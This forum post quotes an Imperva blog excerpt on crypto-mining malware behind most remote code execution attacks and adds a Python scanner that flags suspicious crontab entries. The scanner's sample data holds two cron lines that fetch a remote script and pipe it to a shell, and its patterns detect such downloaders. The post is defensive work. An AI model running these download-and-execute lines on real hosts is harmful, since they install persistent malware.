New Research: Crypto-mining Drives Almost 90% of All Remote Code Execution Attacks

Prorootect

Level 69
Thread author
Verified
Nov 5, 2011
5,855
New Research: Crypto-mining Drives Almost 90% of All Remote Code Execution Attacks – Blog | Imperva

It’s early in 2018 and we have already witnessed one of the top contenders in this year’s web application attacks. Continuing the trend from the last months of 2017, crypto-mining malware is quickly becoming attackers’ favorite modus operandi. In December 2017, 88 percent of all remote code execution (RCE) attacks sent a request to an external source to try to download crypto-mining malware.

These attacks try to exploit vulnerabilities in the web application source code, mainly remote code execution vulnerabilities, in order to download and run different crypto-mining malware on the infected server. The malware usually uses all CPU computing power, preventing the CPU from doing other tasks and effectively denying service to the application’s users.

RCE vulnerabilities are one of the most dangerous of their kind, as attackers may execute malicious code on the vulnerable server. Have you ever wondered what kind of malicious code attackers want to execute? The answer in most cases is – any code that earns the attackers a lot of money with little effort and as quickly as possible.
...
Conclusion
There’s a surge of attackers trying to infect vulnerable servers with crypto-mining malware, and for obvious reasons. Last December almost 90 percent of all the RCE attacks that sent a request to an external source included crypto-mining malware.

Attackers can make a lot of money (off your server resources) with crypto mining, and there are many different cryptocurrencies to mine. The anonymity of transactions and the easy use of regular CPUs make this attack very popular among hackers who want to earn money, and fast.

Crypto-mining malware causes denial of service on the infected server. With most of the server’s computation power directed to crypto mining, the server is rendered unavailable. Also, getting rid of the malware is not so easy due to its persistence, as it adds a scheduled task to download and run it again after a certain period of time.

To protect web applications from crypto-mining malware, the initial attack must be blocked. In this case it’s the RCE vulnerabilities attackers exploit to launch their malware. Organizations using affected servers are advised to use the latest vendor patch to mitigate these kinds of vulnerabilities.

An alternative to manual patching is virtual patching. Virtual patching actively protects web applications from attacks, reducing the window of exposure and decreasing the cost of emergency patches and fix cycles.

A WAF that provides virtual patching doesn’t interfere with the normal application workflow, and keeps the site protected while allowing the site owners to control the patching process timeline.

During a recent research project, we saw an extremely large spike of RCE attacks. In this post we will analyze these attacks, drill down into a malicious crypto-mining script, try to “follow the money”, and check if these attacks really are that profitable for attackers.
... read MORE at the website...
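The Imperva excerpt above notes that the miner persists by adding a scheduled task that periodically re-downloads and re-runs the payload from an external source. The following is an added, defender-side example written for this thread (it is not code from the Imperva post or from MalwareTips): a small scanner that reads crontab-style text and flags entries that fetch a URL with curl/wget, pipe the result into a shell, or run on a very short interval. The crontab content and the TEST-NET IP addresses in it are constructed sample data, not real indicators.

```python
import re
from dataclasses import dataclass, field

# Constructed sample crontab (not from the post). Two entries mimic the
# persistence behaviour described: a frequent job that downloads and runs a
# script from a remote host. Addresses are RFC 5737 documentation ranges.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/15 * * * * curl -fsSL http://198.51.100.23/x.sh | sh
@reboot /usr/local/bin/backup-agent --daemon
30 */2 * * * (wget -q -O - https://203.0.113.9/payload.sh || curl -s https://203.0.113.9/payload.sh) | bash
"""

DOWNLOADER = re.compile(r"\b(curl|wget)\b", re.IGNORECASE)
URL = re.compile(r"""https?://[^\s'"|;&)]+""")
PIPE_TO_SHELL = re.compile(r"\|\s*(ba)?sh\b")
# "*/N * * * *" style schedules: run every N minutes
MINUTE_STEP = re.compile(r"^\*/(\d+)\s+\*\s+\*\s+\*\s+\*$")
FREQUENT_MINUTES = 30  # threshold for the "runs very often" reason (assumed)


@dataclass
class Finding:
    line_no: int
    schedule: str
    command: str
    urls: list = field(default_factory=list)
    reasons: list = field(default_factory=list)


def split_entry(line):
    """Separate the schedule part from the command part of one crontab line."""
    if line.startswith("@"):
        sched, _, cmd = line.partition(" ")
        return sched, cmd.strip()
    parts = line.split(None, 5)
    if len(parts) < 6:
        return "", line
    return " ".join(parts[:5]), parts[5]


def scan_crontab(text):
    """Return a Finding for every entry that downloads from a remote URL.

    Only entries that combine a downloader (curl/wget) with a URL are flagged;
    piping to a shell and a short minute-step interval are added as reasons.
    """
    findings = []
    for line_no, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        sched, cmd = split_entry(line)
        urls = list(dict.fromkeys(URL.findall(cmd)))  # dedupe, keep order
        if not (DOWNLOADER.search(cmd) and urls):
            continue
        reasons = ["remote download"]
        if PIPE_TO_SHELL.search(cmd):
            reasons.append("piped to shell")
        step = MINUTE_STEP.match(sched)
        if step and int(step.group(1)) <= FREQUENT_MINUTES:
            reasons.append("runs every %s minutes" % step.group(1))
        findings.append(Finding(line_no, sched, cmd, urls, reasons))
    return findings


if __name__ == "__main__":
    for f in scan_crontab(SAMPLE_CRONTAB):
        print("line %d [%s]: %s" % (f.line_no, ", ".join(f.reasons), f.command))
```

Pointing the scanner at `/etc/crontab`, `/etc/cron.d/*` and per-user crontab dumps (`crontab -l -u <user>`) gives a quick first pass during triage; a flagged entry is a prompt to inspect the host and the referenced URL, not a verdict on its own, and the same checks can be applied to systemd timers or Windows scheduled tasks with a different parser.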
